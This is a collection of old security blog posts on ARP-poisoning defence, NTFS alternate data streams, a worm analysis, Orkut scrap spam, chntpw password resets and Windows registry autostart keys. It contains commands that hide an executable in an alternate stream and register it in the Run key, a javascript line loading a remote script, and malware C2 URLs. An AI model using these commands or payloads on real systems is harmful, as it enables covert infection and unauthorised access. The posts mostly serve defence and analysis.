If one asks VoIP vendors about their biggest security risk, the obvious answer would be eavesdropping. It’s a breach in confidentiality of the communication and can cause huge business impact.

Unified Communication sniffer (UCSniff) is a next generation VoIP sniffing tool from VIPER Lab.  It can smoothly detect and sniff ongoing audio/video call sessions between the IP phones and store the media in wav, 264 files. It can also capture Voice mail pin codes and alter phone settings.

Considering eavesdropping as one of the biggest threats to VoIP networks, UCSniff can be extremely dangerous and every attacker would want to have it in his arsenal. . UCSniff supports automatic recording and saving of conversations using G.722, G.729, G.726, G.723 codec. Its latest version can intercept H.264 video traffic too. Though wireshark can also decode, store VoIP payload and create audio file out of it. It’s a tedious process if multiple calls get involved in the packet capture. UCSniff makes all this very simple.

These are some of the implications caused by tools like UCSniff.  But how do we prevent our network from it and mitigate the risk? This is what the post is all about…Defeating UCSniff The security measures explained here can also be used to defeat similar tools like VideoJak, Cain and Abel etc.

Before we delve into mitigation techniques, I would like to brief about UCSniff and its architecture. UCSniff is nothing but a strip down version of Ettercap with VoIP protocol dissectors. Ettercap is a well known multipurpose sniffer and logging utility for switched LAN’s. It is also used to implement MITM attacks in the networked environment. Ettercap has different graphical interfaces viz Text, Ncurses and GTK. UCSniff has removed Ncurses and GTK display interfaces along with most of the protocol dissectors and plugins.

Lab Network

So the key essence of UCSniff is ARP-Poisoning. It does the Man-In-The-Middle (MITM) attack using ARP Poisoning techniques of Ettercap and sniff/dumps the VoIP Calls. So, in order to defeat UCSniff, network admin needs to prevent his network from Arp-Poisoning attacks.

I am going to show you a few techniques that can be used to defeat UCSniff and similar tools based on Arp Poisoning.

I have a small VoIP Lab consisting of Cisco Catalyst 3560 series switch along with 4 VoIP phones. Two of them have video capabilities. All phones are registered with SIPXecs server – an open source IP PBX.

UCSniff in action

Let’s run the UCSniff without any ARP protection and see the impact on audio/video conversations.

Adjacent screen shot shows UCSniff   eavesdropping VoIP Audio/Video call using its Live Monitor feature; thereby dumping the audio/video in  respective .wav and .avi files.

Screen shot also demonstrates number of hosts enumerated by UCSniff.

Keep a note of this number, we will need it afterwards. We just saw how easily UCSniff can spy on our calls.

Before we do any security configurations on our Cisco 3560 switch, let me brief you about the security features which we will be using to prevent ARP attacks.

1. DHCP Snooping
2. Dynamic ARP Inspection (DAI)

DHCP Snooping:

DHCP Snooping Configuration

DHCP snooping is a DHCP security feature that provides security by filtering untrusted DHCP messages and by building and maintaining a DHCP snooping binding table.

An untrusted message is one that is received from external network or outside the network or firewall and can cause traffic attacks within your network. DHCP snooping acts like a firewall between untrusted hosts and DHCP servers.

DHCP snooping classifies interfaces as either trusted or untrusted. DHCP messages received on trusted interfaces will be permitted to pass through the Cisco switch, but DHCP messages received on untrusted interface in a Cisco Switch results in putting the interface into error disable state.

Let’s enable DHCP Snooping security feature for VLAN 20 on my lab switch.

Following screenshot shows the DHCP Snooping binding database having 2 entries of my Grandstream phones.

DHCP Snooping binding table

The DHCP snooping binding table contains the MAC address, IP address, lease time, binding type, VLAN number, and interface information that corresponds to the local untrusted interfaces of a switch;  does not contain information regarding hosts interconnected with a trusted interface.

Dynamic ARP Inspection (DAI):

DAI is a security feature that validates ARP packets in a network. DAI intercepts, logs, and discards ARP packets with invalid IP-to-MAC address bindings. This capability protects the network from some Man-in-the-middle attacks. DAI ensures that only valid ARP requests and responses are relayed.

When DAI is enabled, switch performs these activities:

• Intercepts all ARP requests and responses on untrusted ports
• Verifies that each of these intercepted packets has a valid IP-to-MAC address binding before updating the local ARP cache or before forwarding the packet to the appropriate destination
• Drops invalid ARP packets

DAI determines the validity of an ARP packet based on valid IP-to-MAC address bindings stored in the DHCP snooping binding database. If the ARP packet is received on a trusted Interface, the switch forwards the packet without any checks. On untrusted interfaces, the switch forwards the packet only if it is valid.

DAI associates a trust state with each interface on the switch. Packets arriving on trusted interfaces bypass all DAI validation checks, and those arriving on untrusted interfaces undergo the DAI validation process.

Following screenshots shows the Dynamic ARP Inspection configuration on my lab Switch.

In a typical network configuration, you configure all switch ports connected to host ports as untrusted and configure all switch ports connected to switches as trusted. With this configuration, all ARP packets entering the network from a given switch bypass the security check. By default all the switch ports are configured as untrusted.

With these security measures in place, let’s run UCSniff again and see the result.

I have plugged in my laptop on switch port Fa0/3 with IP address 172.16.20.7

Above screenshot shows UCSniff was able to detect only one host which is the gateway. Why this has happened?

DAI console logs

Let’s have a look into the adjacent switch console.

Note a line “%SW_DAI-4-PACKET_RATE_EXCEEDED:” from the above console log screenshot. It also shows ARP -inspection error detected on interface Fa0/3 and its link state has changed to down and my laptop is kicked out of the network. This has happened because of the rate limiting module of DAI feature.

DAI disabled soruce ARPScan switchport

Rate Limiting of ARP Packets:

The switch performs DAI validation checks, which rate limits incoming ARP packets to prevent a Denial-of-Service attack. By default, the rate for untrusted interfaces is 15 packets per second (pps).

Trusted interfaces are not rate limited. You can change this setting by using the “ip arp inspection limit” interface configuration command.

When the rate of incoming, ARP packets exceeds the configured limit, the switch places the port in the error-disabled state. The port remains in that state until you intervene.

I plugged in my laptop in Fa04, Fa05 and ran UCSniff and got similar results. Following screen shot shows the status of all the switch interfaces from where I ran UCSniff.

Now the obvious question that appears is that rate limiting module will defeat UCSniff but what about the tools which perform ARP poisoning slowly and do not scan for target hosts?

Let’s try this scenario and poison single hosts by sending fake ARP request/reply packets. As ARP poisoning single host needs only 2 spoof ARP packets; Rate limiting module will not trigger and we should be able to get around with the DAI feature right? But it failed again How?Let’s check the switch console in following screenshots.

Error logs by DHCP Snooping

The line “%SW_DAI-4-DHCP_SNOOPING_DENY” from the screenshot explains everything. When we send ARP reply with spoofed MAC address, switch checks the ARP packet with the DHCP Snooping binding table and drops the packet as MAC/IP does not match with the table entries; defeating the ARP attack.

You can use the “errdisable recovery” global configuration command to enable error disable recovery so that ports automatically emerge from this state after a specified timeout period. Adjacent screenshots shows the way you can use the “errdisable recovery cause” global configuration command to enable error-disabled ports after a specified timeout period.

Recover ports disabled by DAI

Other Prevention techniques:

Though ARP attacks are dangerous and can cause dire results; Dynamic Arp Inspection can easily defeat such attacks and ensure that our mission-critical communications and systems are protected.

SOHO administrators can also make use of open source tools like ARPOn (http://arpon.sourceforge.net ) to protect their systems from ARP poisoning attack.

ArpON (Arp handler inspectiON) is a portable handler daemon with some nice tools to handle all ARP aspects. It has lots of features and it makes Arp a bit safer. This is possible using two kinds of anti Arp Poisoning techniques, the first is based on SARPI or “Static Arp Inspection”, the second on DARPI or “Dynamic Arp Inspection” approach.

As ARPOn is not ported on embedded devices like routers and phones, it’s more of a host based solution. Read more about from references.

Another Linux Kernel Module ARP* (ARP Star) can also be used on your Linux gateway to detect and prevent ARP poisoning attacks.

This project has been coded in C and is available as a module for the 2.6 Linux kernel series. The only libraries needed are included in the Linux kernel. It has also been ported to the Linksys WRT54G

I have not played with these tools yet, but, down the line will surely write post on both of them. Till then stay SAFE

Though the implications of tools attacking Layer 2 are dire, prevention mechanisms are quite simple and effective.

“Security is more than designing strong cryptography into a system; it’s designing the entire system such that all security measures, including cryptography, work together.” — Bruce Schneier

References:

• Dynamic ARP Inspection
• DHCP Snooping
• http://arpon.sourceforge.net/documentation.html
• http://arpstar.sf.net

With the introduction of NTFS file system in Windows NT, Microsoft introduced new concept of having multiple streams into single file known as Alternate Data Streams (ADS). In this blog i will discuss some advantages and disadvantages of ADS.
Whenever we perform any operations on any file like – reading, writing, editing etc, we did it on the main stream of the file. This alternate data stream can be of binary or ASCII data. We can attach the streams to any file including executables and folders.

The biggest advantage of the ADS is its by default invisibility to the file handling utilities provided by Microsoft Windows like – File explorer, dir command etc. Unlike staganography, adding alternate stream to a file does not affect its original size that makes it almost impossible to detect.

ADS Capability was originally introduced to for compatibility with the Hierarchical File System (HFS) where data sometimes gets forked into separate resources. ADS are used by many legitimate windows programs to store file information such as attributes and temporary storage.
Virus writers can take advantage of these stealth functionalities provided by ADS to hide malicious data in the alternate stream attached with legitimate files and easily defeat normal user and most of the antivirus present.

How to create an ADS:
===============
Following command will create an hiddenFile.txt as ADS with explorer.exe file present in %SystemRoot%
c:\>echo “This is confidential data.” >c:\windows\explorer.exe:hiddenFile.txt

Following command will allow you to read the data present in the ADS. If you check the size of explorer.exe after attaching the alternate stream, will be exact same.

c:\>type c:\windows\explorer.exe:hiddenFile.txt
This is confidential data.
c:\>

Attaching executable as an ADS:
=======================
You can even attach executables using ADS and believe me this is where ADS is boon for virus writters. Virus writters can attach malicious executable with the legitimate one and make it execute at every boot time.

C:\>copy %SystemRoot%\system32\calc.exe c:\blog\ads\
C:\>type maliciousFile.exe > c:\blog\ads\calc.exe:newCalc.exe
C:\> reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v newLiveUpdate /t REG_SZ /d C:\blog\ads\calc.exe:newCalc.exe

Once these three commands are executed on the victim machine, on every boot program newCalc.exe will automatically gets executed.
To test it, you will need to reboot your system once.

Above things are very simple and does not require any skills, this is what makes it very dangerous. Virus writer can hide most of its virus code into ADS and to keep a small executable that will extract the virus.
Whatever we discuss till now can be considered as an Ugly side(for us) of ADS. Now lets focus on about the removal of ADS from the infected systems.

How to detect ADS:
==============
Unfortunately, there are no windows tool which will scan the file and let you know about the alternate stream attached with the file.
There is one third party utility called lads.exe which you can use to manually scan the file for the presence of the ADS. You can download this tool from http://www.heysoft.de

Manually scan following REGISTRY location using regedit tool for the presence of string containing “:” e.g. c:\windows\exeplorer.exe:virus.exe

Always be suspecious for the entries in the above locations and delete unwanted entries and like one given in above example.

Lets look at the good side of the ADS. We can use these invisibility feature of ADS for many different purposes.
1) We can attach confidential files or files which we don’t want to get deleted accidently to the system files which usually nobody deletes. This is useful especially when system us shared between multiple users.
2) We can store passwords, pin codes in ADS.
3) You can use freeware “Xidie Security Suite” to keep your private data hidden usin ADS. You can download this tool from http://www.xidie.ro

How to Delete already created ADS:
========================
As we have already seen, ADS is only supported on NTFS file system. So Moving ADS file on drive fomatted with FAT will remove the ADS present on the moved file.
On the NTFS file system, go to start->run and type “notepad <path of ADS>”

e.g notepad c:\blog\ads\test.txt:hiddenFile.txt
and delete the complete content of the file and save it.

As of now there are very few viruses exists which exploits this ADS functionality but don’t get surprised if you see more of those in near future as most of the current anti-viruses are not capable of detecting virus hidden inside ADS.

Originally posted 2008-06-07 17:59:27. Republished by Blog Post Promoter

On 1st June Google has made their Passive web security Assessment tool RatProxy open source. Google confirmed that they were using this tool internally for analyzing interactive browser driven interactions. The tool is released under an Apache 2.0 software license.
Inspite of being in Beta phase, ratProxy has lot of features compared to other similar web proxy tools – WebScarab, Paros, Burp, ProxMon, and Pantera.

Official website describes the tool as -
“A semi-automated, largely passive web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.

Detects and prioritizes broad classes of security problems, such as dynamic cross-site trust model considerations, script inclusion issues, content serving problems, insufficient XSRF and XSS defenses, and much more.

Ratproxy is currently believed to support Linux, FreeBSD, MacOS X, and Windows (Cygwin) environments. ”

Following are some salient features of ratProxy that gives it an edge over others.
1) It does not generate high volumes of attack simulating traffic.
2) Test lot of web2.0 features including XSS, CSRF etc
3) Sniff content from stylesheets .
4) Supports SSL.
5) Support proxy-chaining.
6) Flash based XSS detection.
7) Precise Reports. etc

Though tool is good enough to test security vulnerabilities in the Web applications, should not be consider sole testing solution. Manual testing and verification of results must be followed after generating ratProxy report.

More detailed information about the tool can be found here.
Following snapshot shows the report generated by ratProxy.

You can download the tool here.

With the continous improvement in Web2.0, Security Professionals need to keep their tools updates and we all hope ratProxy will stand by us to protect those improvements.

Originally posted 2008-07-08 09:13:13. Republished by Blog Post Promoter

Like most of the users I too used to get “Cannot Synchronize Address Book” notification whenever i used to login in my OCS Communicator client. This happened when we do custom installation of any application, do not configure optional features etc.

I used to ignore that notification most of the time except today. I got irritated by yellow exclamation mark on Communicator Icon in system tray and I decided to hunt down the problem.
I didnt do much on my own except following paths shown by Google. I searched for a while, went through some forums and fixed the problem(s).

This post is to summarize the working steps gathered from different forums. Following are the steps that i followed in the process.

• Open the Office Communications Server 2007 management console and Expand server running with web components service.

• From the Available Task in right pane, Expand Validation and Select and complete the Web Components Server Validation wizard.
  • If wizard failes with Connectivity error “Failure [0xC3FC200D] One or more errors were detected.” then problem is Default website on Web Component Server is not assigned with valid/no  certificate. Refer here to fix this.
  • If the Validation Wizard fails with GroupExpansion and AddressBookServer Configuration then the problem is because Windows Server 2003 SP1 includes a new security feature named loopback check functionality. Validation wizard tries to visit following URL’s but fails  due to authentication failure. However, if you visit the same URL’s from system; other than Web Component Server, it works perfectly.
    • https://[ocs_server_pool]/GroupExpansion/Int/service.asmx
    • https://[ocs_server_pool]/Abs/Int/Handler/D-0ba0-0ba2.dabs
  • Microsoft has already documented workarounds for these error. Follow the references and you are through.
• Once the problem is resolved you can search needed users contact details as shown in following screen shots.      I am now happy to see my communicator free from Yellow Exclamation mark

References:

1. Assign Certificate to Default Web Site
2. Workaround for Loopback Check

Originally posted 2009-03-13 18:54:19. Republished by Blog Post Promoter

Have you ever forgot your WindowsXP or Vista’s Administrator password? Have you ever re-installed your XP just because you forgot your admin password and didn’t know how to reset it? Do you want to reset your friends Administrator password?

If your answer for any of the above question is ‘yes’ then this is the right place for you to get help. In this post i will explain simple way to reset password of any user account using a linux live CD. I will be explaining the password resetting procedure using Ubuntu live cd. Its not mandatory to use live cd, same steps can be used if you have duel boot linux partition.

Prerequisites:

• Ubuntu Live CD
• CD-ROM should be the first option in the target computers bios boot sequence.

OK  if you have met above mentioned pre-requisites, lets get started. We will be using a small NT password recover utility chntpw ( change NT password ). chntpw contains a simple registry editor which allows us to change bits and bytes.

Default ISO of Ubuntu-9.04 does not contain chntpw utility. We need to explicitly install it using either of following way.

• $ sudo apt-get install chntpw

• Manual: If repository do not find the package.

We need to manually satisfy dependencies for chntpw utility by using

Bughira# apt-get install libgcrypt11

Now download debian package of chntpw utility from here and install it using

Bughira:~# dpkg -i chntpw_0.99.5-0+nmu1_i386.deb
Selecting previously deselected package chntpw.
(Reading database ... 129568 files and directories currently installed.)
Unpacking chntpw (from .../chntpw_0.99.5-0+nmu1_i386.deb) ...
Setting up chntpw (0.99.5-0+nmu1) ...
Processing triggers for man-db ...
Bughira:~#

Resetting the password:

• Mount the windows partition
• Change the current directory to WINDOWS\system32\config

• Bughira# chntpw -l SAM  (this will list all the configured users on the target system)

* SAM policy limits:
Failed logins before lockout is: 0
Minimum password length        : 0
Password history count         : 0
| RID -|---------- Username ------------| Admin? |- Lock? --|
| 03eb | admin                          | ADMIN  | dis/lock |
| 01f4 | Administrator                  | ADMIN  | dis/lock |
| 03ed | ASPNET                         |        |          |
| 01f5 | Guest                          |        | dis/lock |
| 03e8 | HelpAssistant                  |        | dis/lock |
| 03ea | SUPPORT_388945a0               |        | dis/lock |

• Bughira# chntpw -u Administrator SAM

• If we do not specify any user account then Administrator user account it selected and following menu is presented

- - - - User Edit Menu:
 1 - Clear (blank) user password
 2 - Edit (set new) user password (careful with this on XP or Vista)
 3 - Promote user (make user an administrator)
 4 - Unlock and enable user account [probably locked now]
 q - Quit editing user, back to user select

Enter ‘1′ as choice to clear the password and you are done. We can even change the password or promote another user as an administrator of the system.

Select: [q] > 1
Password cleared!

Hives that have changed:
 #  Name
 0  </media/disk/WINDOWS/system32/config/SAM>
Write hive files? (y/n) [n] : y
 0  </media/disk/WINDOWS/system32/config/SAM> - OK

Now you can reboot the system and happily login in your crapy windows box

Enjoy!!

Originally posted 2009-06-16 15:09:40. Republished by Blog Post Promoter

Today, I was sitting in a dark room  self-evaluating about some things I did in past couple of months. And I realized my JOB is making me a lazy ass. It’s been a long time since I analyzed any malicious binary. So  I decided to  pick up a random old malware sample from my 320 GB Western Digital HDD and analyze it.
I remember one of my colleagues had un-intentionally uploaded an infected binary file on sourceforge.net a few days back. When we downloaded the infected binary for test, our Avast antivirus  alerted and deleted the file.

That binary file was uploaded to sourceforge from my colleague’s infected desktop. We immediately removed all the files; created new binaries on antivirus protected computer and then uploaded again in our project files directory.

Thank God we decided to test files before announcing the release on mailing lists.

When I tested infected binary file on one of my test machines, I was shocked to see the infection capacity of 24 KB virus. This malware is capable of infecting every single executable on the system. It has the capacity to spread via flash drives and making infected system so called bots. I must say it’s one of those virus species which needs complete reformatting of infected hard drive to recover.

I decided to analyze same infected binary and write a blog post about its analysis.

Let’s get started by booting up my windows XP SP3 sandbox under VMWare. This sandbox is victim machine installed with all the tools required for analysis.
Ok! I have Avast Antivirus installed on my sandbox but as it detect the malware and clean it by deletion, I stopped it. I have copied the malware tar ball under c:\malware directory and extracted it.
Malware author has transformed or changed the default executable icon to an icon of a folder. It’s a simple trick to make end user double click the binary and launch itself in memory.

Malicious Binary File properties

I checked the properties of binary file to gather some information. Adjacent screenshot shows some information about the binary.

Before doing its behavior analysis; I thought of collecting readable strings from the binary. As most of the time malwares are packed, it’s difficult to get actual strings from the binary. Many times we ended up getting harvested string from the malware. As expected, output did not reveal any secrets about the malware.
Now, is the time to run malware and note down its behavior. I launched Regmon, Filemon, process explorer and wireshark and launched the malware by double clicking it.
As soon as the Malware got in the memory, following changes were noticed:

• Spawned 3 different processes

1. fun.exe
   

   Avast Antivirus getting killed

2. SVIQ.exe
3. dc.exe

• Killed Avast antivirus and disabled its update and notification services
• Disabled Windows Firewall and its notifications.
• Killed FileMon and corrupted process explorer.
• Created 7 copies of itself in various locations under Windows directory with folder icon.

1. c:\Windows\dc.exe
2. c:\Window\SVIQ.exe
3. c:\Windows\help\Other.exe
4. c:\Windows\inf\Other.exe
5. c:\Windows\system\fun.exe
6. c:\windows\system32\WinSit.exe
7. c:\Windows\system32\config\Win.exe

• Added itself in authorized application list under windows firewall configuration.
• Added itself to load whenever windows starts

HKU\S-1-5-21-220523388-1935655697-1177238915-500\Software\Microsoft\Windows NT\CurrentVersion\Windows\load: "C:\WINDOWS\inf\Other.exe"
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe C:\WINDOWS\system32\WinSit.exe"
HKU\S-1-5-21-220523388-1935655697-1177238915-500\Software\Microsoft\Windows NT\CurrentVersion\Windows\run: "C:\WINDOWS\system32\config\Win.exe"
HKU\S-1-5-21-220523388-1935655697-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Run\dc2k5: "C:\WINDOWS\SVIQ.EXE"
HKU\S-1-5-21-220523388-1935655697-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Run\Fun: "C:\WINDOWS\system\Fun.exe"
HKU\S-1-5-21-220523388-1935655697-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Run\dc: "C:\WINDOWS\dc.exe"

• Disabled Windows TaskManager and Registry editor

HKU\S-1-5-21-220523388-1935655697-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline: 0x00000000
HKU\S-1-5-21-220523388-1935655697-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr: 0x00000001
HKU\S-1-5-21-220523388-1935655697-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools: 0x00000001

• Disabled Antivirus notifications and Firewall file tracing options.

HKLM\SOFTWARE\Microsoft\Security Center\UacDisableNotify: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\AntiVirusOverride: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\AntiVirusDisableNotify: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\FirewallDisableNotify: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\FirewallOverride: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\UpdatesDisableNotify: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\UacDisableNotify: 0x00000001
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\EnableFileTracing: 0x00000000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\EnableConsoleTracing: 0x00000000
HKLM\SOFTWARE\Microsoft\Tracing\FWCFG\FileTracingMask: 0xFFFF0000

• Bypass the firewall by creating following registry entry

HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\[infected file path]: "[infected file path]:*:Enabled:ipsec"

• The worm added the following string in the %Windir%\wininit.ini file

NUL=C:\WINDOWS\Help\Other.exe

• Malware also had a buddy system in place.  It means that when I tried to kill the parent process, child process restarted the parent process and vice-versa. This way, both were  watching each other’s back.

As malware gets unpacked in memory; strings from memory become valuable assets. I saved the copy of strings from the malware running in memory and started looking for something interesting.  Following are some of the interesting strings.

      Olalala, may tinh cua ban da dinh Worm DungCoi...........
      yahoobuddymain
      yalertclass
      button
      Open
      ymsgr:sendIM?
      yiminputwindow

From above strings, it looks like Malware send “Olalala, may tinh cua ban da dinh Worm DungCoi………..” IM message using yahoo messenger.

New Process Spawned

Presence of following strings also gives clue of Malware which is packing its payload using UPX packer.

      !This program cannot be run in DOS mode.
      Richm
      UPX0
      UPX1
      UPX2
      UPX!

These strings can also be decoyed by harvested strings to fool malware analyzers. But let’s not ignore them. I installed yahoo messenger to confirm my findings. I killed the process tree of the Malware; installed yahoo messenger did login with a dummy account, reinstalled process explorer and restarted the malware.

This time other than spawning 3 processes, I found Malware had spawned another process called winbafcra.exe. I located the image path and made a copy of it for further analysis.

Empty IM Popup

While I was copying the binary, all of a sudden I got an empty yahoo messenger pop up from user “dungcoi_vb”. Following screen shot shows the yahoo messenger pop up.

Though I did not get any message in the IM Chat box, screenshot proved my first assumption. This was definitely another variant of Dungcoi virus as it was carrying another virus payload inside it. Now let’s analyze Winbafcra.exe.

Analysis of Winbafcra.exe:

Lets first find out if this binary is packed using packer detectors. As expected, PEiD

RDG: UPX Packer Detected

and RDG both detected binary packed with UPX packer. Following screenshot shows PEiD and RDG detected UPX packer. I unpacked the binary using UPX tool as shown in following screenshot.

Unpacking UPX Packer

Following are the details of the findings.

• Malware is packed with UPX Packer. Once Unpacked and launched, it creates a mutex with name “S_SERV_v0.66_Beta_erf”.

• Made outbound connection to hxxp://parkinglot.information.com

• Opened TCP Port 25 (SMTP) and 2007
  

  Socket Connections

Tried to access following host names

mailin-01.mx.aol.com
mailin-02.mx.aol.com
mailin-03.mx.aol.com
mailin-04.mx.aol.com
mxs.mail.ru
mx1.yandex.ru
mx2.yandex.ru
imx1.rambler.ru
c.mx.mail.yahoo.com
d.mx.mail.yahoo.com
maila.microsoft.com
bl.spamcop.net
cbl.abuseat.org
list.dsbl.org
sbl-xbl.spamhaus.org
zen.spamhaus.org
combined.njabl.org
multihop.dsbl.org
blackholes.uceb.org
bl.csma.biz
db.wpbl.info
dnsbl.njabl.org

• Following files were requested from the remote web server.

http://hgfdujt.info/?%x
http://hgfdujt.info/i.php
http://hgfdujt.info/myh.php
http://hgfdujt.info/?4bf55
http://195.24.77.223/utest/?jutr=%d&oo=%d&%x=%x&ra=%d
http://hgfdujt.info/?4f682
http://hgfdujt.info/?50641
http://hgfdujt.info/?53b1c
http://hgfdujt.info/?59cf3
http://hgfdujt.info/?61b6a

Malware tried to setup a mail relaying server on the infected box and also tried to download another set of malicious files from internet.

Decoded Javascript

One of the contacted domains was “mattfoll.eu.interia.pl”. Malware downloaded index.html file from this domain. This html file was obfuscated with JavaScript code.
Following screenshots shows the series of decoded JavaScript code which were trying to download another whole set of new malwares.

Attempt to inject iframe

As all the requested file locations were no longer valid, malware was not able to download requested files, hence the analysis was interrupted.

A simple whois query showed that malware was trying to contact some Russian webserver and as malicious files were removed from the domain, it was not under Blacklisted domain list.

Malware Home

Removal of Fun.exe and Winbafcra.exe

1. Kill process tree started by fun.exe
2. Delete all 7 binaries created by malware from their locations.
3. Delete the added registry locations using third party registry editors like Registry Workshop.
4. If disabled, enable the Antivirus or install antivirus and scan whole system for traces of malware.
5. AVG Antivirus has provided a standalone utility to clean the infected system.  You can download the utility here and remove the infection.

Safety Measures:

• Do not use internet explorer for browsing the internet.
• Do not click on links within the emails or IM received from untrusted sender.
• Update your antivirus everyday and scan your system periodically to stay safe.

Download Analysis:

I have taken many screen shots and stored output of various tools while analyzing this malware. Posting all these material would have made post long hence giving analysis tarball for download.

Tarball contains:

• Outbound connection of the worm in wireshark packet capture.
• Regmon output
• Strings from the memory
• Some screen shot taken while analysis.
• File Size: 616 KB
• MD5 Hash:3e23d63c7642d6eb1f1c47de2a73870b

Sipera VIPER Lab is in news again; this time by targeting Award Winning UC solution from Microsoft.  Viper Lab released first ever Microsoft Office Communication Server Assessment Tool (OAT) at VoiceCon 2009 in Orlando. Tool is named OAT and is develop to help IT manager and security practitioners evaluate the security architecture of their deployments and ensure that their mission-critical communications and systems are protected.

This tool is completely written in C# and released under BSD License. It has nice user friendly GUI with following features:

• Online Dictionary Attack
• Presence Stealing
• Contact List Stealing
• Single User Flood Mode
• Domain Flood Mode
• Call Walk
• Play Spam Audio
• Detailed Report Generation

A detailed description of what these features are and how they can be used can be found here.

Once Online Dictionary Attack is successful against the target user, attacker can launch different attacks on the users configured for Communication Server or on the Roaming contact of target user depending on OAT Attack mode.

According to the OAT documentation; OAT works in two different scenarios

• Internal Network Attack Mode
  • OAT sits inside the corporate network and directly connects to Front End Pool Servers and Authenticate against Active Directory simulating the internal attacker scenario.

• External Network Attack Mode
  • In this mode OAT can be launched anywhere from internet and connects to Access Edge Server for presence and IM; It is also authenticated using Active Directory and uses A/V Edge for other assessment features.

With the release of OAT, its clear that Security Researchers are gearing up for Microsoft UC Solution.

References

• OCS Assessment Tool (OAT)
• OAT Gallery

Originally posted 2009-04-02 18:58:17. Republished by Blog Post Promoter

hi All,

Have you ever use some script in Orkut to send common scrap to all of your friends? And you found it cool right? Its cool till you are using it for say – thanking all your friends for BirthDay wishes, or wishing all friends Happy New Year but its irritating when you receive junk scraps from un/known friend. These tempting but Junk scraps are nothing but SPAM.

These days Orkut spam is increasing. Lot of people are falling pray to the tempting scraps ( .. album hack, crush finder etc ). They without thinking click on the link and end up in dissapointment. Nothing happens in front of their eyes but they never realise lot of stuffs had already happened in background.

Sometime back i came across Angelina Jolie movie “Beowulf” having tagline – Temptation is curse.
Many people have temptation to view locked profiles..sometimes i have it too

( FYI: album hack does not work anymore. To my knowledge, Its patched..)

People clicking on link never realise how much they are contributing in spreading spam.
Lets face it, people never try to read the security tips provided by orkut team on the their home pages but always read the “Today’s Fortune”

Now the question arises how to stop ( i know its difficult, but at least slow down) scrap spammers?
Here i’ll give some steps which even lay man will understand and try to put break on spammers.

1) Everytime you get link in scrap. Be suspecious to it in first glance.
2) Don’t directly click on the link. instead right click on the link and choose “copy link location” from the context menu. ( if link is not displayed in scrap.) else just copy the displayed link.
3) Open Notepad or any text editor and paste the link there. It might look as
javascript:d=document;c=d.createElement(’script’);d.body.appendChild(c);c.src=’http://somedomain.com/somescript.js’;void(0)

4) Now copy another URL from the src tag of the link and paste it in the Browsers address bar in new tab.
i.e copy “http://somedomain.com/somescript.js” without quotes

5) This will either give you some source code or give a pop up box to download the file.
6) In case of download pop up, save the file on the disk and open it in notepad.
If you get the source code browser then no need to download the file.
7) Try to search for the strings like scrapall,sendscrap,scrapbook.aspx,cmm_join etc. If any one of the listed word is present in the .js file. Please delete the file from the hard drive and delete the scrap without clicking the link.
In most of the cases, we can find these words. People who have java script knowledge can digg deep inside the script and find out its working.

If you see the .js file name is from orkutx.js, freecall.js, users.js ; delete the scrap and filename from the hard drive. Sometimes link from scrap is nothing but an orkut user profile or Community profile.
I would like to encourage users to report such profiles and communities as abuse and choose Spam in the category.

I know the procedure is bit lengthy and needs time especially for non-techie people but i guess its worth spending 5-10 minutes rather than joining 20-25 communities which you can not unjoin or installing spyware on
our system and risking your orkut account just by clicking it.

Following is the video showing how fast orkut worm is spreading.

[youtube=http://www.youtube.com/watch?v=lS1P9kdg3_8]

Originally posted 2008-04-19 03:00:53. Republished by Blog Post Promoter

My Last post was related to the ADS technology adopted by viruses and rootkits. These viruses can implement Alternate Data Streams and easily hide themselves behind legitimate files. I also did a small mention of how to get suspicious whenever you see some new entry in Registrys keys used to start program with operating system. In this post, i am going to extend the last post  and write about some REGISTRY locations which can be used by virus writers to execute virus/rootkits whenever some files like .txt,.jpg,.bin gets executed.

Every file type has a program associated with it. Like .txt file is usually get opened in Notepad.exe while .mp3 files get opened in Windows Media Player.

Now the question is – How does Windows knows that when user wants to open “file.txt” so, it should open “notepad.exe” and lauch “file.txt” inside it?

The answer is – Windows Operating System maintains the file type association in the Registry Database. The HKEY_CLASSES_ROOT hive from the registry maintains all the file types and their respective associations.

Lets take an example for better understanding of the concept. Lets say we have created a new file type called .abc which our software can only read and we want it to get associated with our software. All we need to do is add new Key in HKEY_CLASSES_ROOT of .abc as shown below.

The next step is to put another key “abcfile” in the same location and add subkeys as shown below.

Out of all subkeys, “shell” subkey is very important. The path of executable mentioned in the “command” subkey from “shell” gets associated with the .abc file and whenever user opens a file with extension .abc; MySoftware.exe gets launched automatically.

Following entries are also associated with the file type association and execution. If your program is taking some extra time to launch the associated file, it will be worth viewing the above and below mentioned registry entries for ADS or traces of viruses.

HKEY_CLASSES_ROOT\comfile\shell\open\command
HKEY_CLASSES_ROOT\batfile\shell\open\command
HKEY_CLASSES_ROOT\htafile\shell\open\command
HKEY_CLASSES_ROOT\piffile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command

Don’t forget to open and review following files too.
